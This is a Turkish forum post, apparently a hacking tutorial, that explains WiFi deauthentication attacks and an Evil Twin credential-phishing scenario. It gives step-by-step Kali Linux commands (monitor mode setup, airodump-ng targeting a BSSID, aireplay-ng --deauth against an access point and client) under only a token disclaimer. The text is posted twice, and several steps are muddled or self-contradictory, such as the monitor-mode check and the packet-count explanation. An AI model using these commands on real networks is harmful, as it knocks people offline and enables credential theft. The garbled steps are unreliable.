- Joined
- Aug 31, 2022
- Topics
- 27
- Messages
- 216
- Reaction score
- 333
Merhaba sayın okur, öncelikle yazıya geçmeden sana şunları söylemek istiyorum. Bu saldırı yönetimini lütfen başkalarına karşı kötü amaçla kullanma (Kullanım halinde ben ve RC AİLESİ sorumlu değildir.). Bunu ağına istemediğin biri bağlandığında (misafir çocuğu 
veya bir hacker), kullanmalısın. Başkalarının huzurunu bozmaya hakkının olmadığını sana hatırlatayım.
DEAUTH SALDIRISI
Bu saldırıyı iki türe ayırıyoruz:
Ayrıca, broadcast bir atak gerçekleştirdiğinde istemciler kendilerine gönderilen deauthentication paketlerini drop edebilirler.
Client-Based saldırı türünde bir ağdaki tek bir cihaz hedef alınırken, Broadcast saldırı türünde direkt olarak modem hedef alınır.
ÖRNEK SENARYO
Gökhan Bey uzun bir süre sonra evine geldiğinde ev internetine bağlanmak istediğinden kendi ev internetinin isminin bulunduğu ağ adresine tıklar. Ancak karşısına modeminin güncellenmesi gerektiğine dair bir uyarı mesajı çıkar ve mesajın altında modemin şifresi istenmektedir. Gökhan Bey zaten internetinin yavaş olduğundan şikâyet ettiği için modem şifresini yazar ve ilerleyen zamanlarda kişisel bilgilerinin çalındığı bilgisi ona gelir.
Bu senaryoda Evil Twin saldırısı uygulanmış olup hacker hedefin modem ismini taklit edip yeni bir ağ oluşturmuştur. Orijinal ağdaki hedefe Deauthentication Attack uygulanmış olup hedef taklit edilen ağa bağlanmıştır ve hedef sosyal mühendislik oyunlarıyla kandırılmıştır.
DEAUTH ATTACK NASIL UYGULANIR?
Wifi Card'a ihtiyacımız var bilgisayarımız ile uyumlu bir Wifi Card satın alıp gerekli ayarlamaları yapıyoruz. Ardından Kali Linux'un komut panelini açıp:
-ifconfig wlan0mon down #komutu ile öncelikle etkisiz hale getirilir.
-iwconfig wlan0mon mode monitor #komutu ile de monitor moda getirilir.
-ifconfig wlan0mon up #komutu ile etkin konuma getirilir.
-iwconfig wlan0mon #komutu ile managed moda gelip gelmediği kontrol edilir.
Ardından çevredeki sinyalleri toplamak için:
-airmon-ng wlan0mon
Saldırı yapacağımız modemin adını gördükten sonra yanındaki BSSID'sini ve Channel numarasını alıp:
-airodump-ng –channel 10 –bssid 12:34:56:78:90 wlan0mon
Saldırı yapacağımız cihazın MAC adresinden bulup onu seçtikten sonra:
-aireplay-ng –deauth (göndermek istediğiniz paket sayısı, örnek: 200) -a (hedef modem mac adresi) -c (kullanıcı mac adresi) wlan0mon
Deauth deauthentication kelimesinin kısaltımıdır,
200 sayısı ağa kaç paket yollayacağımızı göstermektedir ve bu sayı ile hedefinize ne kadar sürede bağlanmasına göre değiştirilebilir. Eğer kısa sürede ağa bağlanmasını istiyorsak bu sayı küçük; daha hızlı bağlanmasını istiyorsak bu sayı büyük olmalıdır.
Her şeyi başarı ile tamamladıysanız hedef cihaz, hedef ağdan kopmuş olacak. Bu saldırı türünde daha da ileri giderek internet şifresi kırılabilir. Fakat WPA2/PSK veya WPA2 gibi Korunmalı Geçiş sistemleri varsa hedef modemde internet şifresi kırmanız çok düşük bir ihtimaldir.
İYİ FORMLAR MEMOŞ SUNAR. YARARLI OLDUYSA KONUYU BEGENMEYI UNUTMAYIN.
veya bir hacker), kullanmalısın. Başkalarının huzurunu bozmaya hakkının olmadığını sana hatırlatayım.DEAUTH SALDIRISI
Bu saldırıyı iki türe ayırıyoruz:
- Client-Based Deauthentication Attacks
- Broadcast Deauthentication Attacks
Ayrıca, broadcast bir atak gerçekleştirdiğinde istemciler kendilerine gönderilen deauthentication paketlerini drop edebilirler.
Client-Based saldırı türünde bir ağdaki tek bir cihaz hedef alınırken, Broadcast saldırı türünde direkt olarak modem hedef alınır.
ÖRNEK SENARYO
Gökhan Bey uzun bir süre sonra evine geldiğinde ev internetine bağlanmak istediğinden kendi ev internetinin isminin bulunduğu ağ adresine tıklar. Ancak karşısına modeminin güncellenmesi gerektiğine dair bir uyarı mesajı çıkar ve mesajın altında modemin şifresi istenmektedir. Gökhan Bey zaten internetinin yavaş olduğundan şikâyet ettiği için modem şifresini yazar ve ilerleyen zamanlarda kişisel bilgilerinin çalındığı bilgisi ona gelir.
Bu senaryoda Evil Twin saldırısı uygulanmış olup hacker hedefin modem ismini taklit edip yeni bir ağ oluşturmuştur. Orijinal ağdaki hedefe Deauthentication Attack uygulanmış olup hedef taklit edilen ağa bağlanmıştır ve hedef sosyal mühendislik oyunlarıyla kandırılmıştır.
DEAUTH ATTACK NASIL UYGULANIR?
Wifi Card'a ihtiyacımız var bilgisayarımız ile uyumlu bir Wifi Card satın alıp gerekli ayarlamaları yapıyoruz. Ardından Kali Linux'un komut panelini açıp:
-ifconfig wlan0mon down #komutu ile öncelikle etkisiz hale getirilir.
-iwconfig wlan0mon mode monitor #komutu ile de monitor moda getirilir.
-ifconfig wlan0mon up #komutu ile etkin konuma getirilir.
-iwconfig wlan0mon #komutu ile managed moda gelip gelmediği kontrol edilir.
Ardından çevredeki sinyalleri toplamak için:
-airmon-ng wlan0mon
Saldırı yapacağımız modemin adını gördükten sonra yanındaki BSSID'sini ve Channel numarasını alıp:
-airodump-ng –channel 10 –bssid 12:34:56:78:90 wlan0mon
Saldırı yapacağımız cihazın MAC adresinden bulup onu seçtikten sonra:
-aireplay-ng –deauth (göndermek istediğiniz paket sayısı, örnek: 200) -a (hedef modem mac adresi) -c (kullanıcı mac adresi) wlan0mon
Deauth deauthentication kelimesinin kısaltımıdır,
200 sayısı ağa kaç paket yollayacağımızı göstermektedir ve bu sayı ile hedefinize ne kadar sürede bağlanmasına göre değiştirilebilir. Eğer kısa sürede ağa bağlanmasını istiyorsak bu sayı küçük; daha hızlı bağlanmasını istiyorsak bu sayı büyük olmalıdır.
Her şeyi başarı ile tamamladıysanız hedef cihaz, hedef ağdan kopmuş olacak. Bu saldırı türünde daha da ileri giderek internet şifresi kırılabilir. Fakat WPA2/PSK veya WPA2 gibi Korunmalı Geçiş sistemleri varsa hedef modemde internet şifresi kırmanız çok düşük bir ihtimaldir.
İYİ FORMLAR MEMOŞ SUNAR.
YARARLI OLDUYSA KONUYU BEGENMEYI UNUTMAYIN.
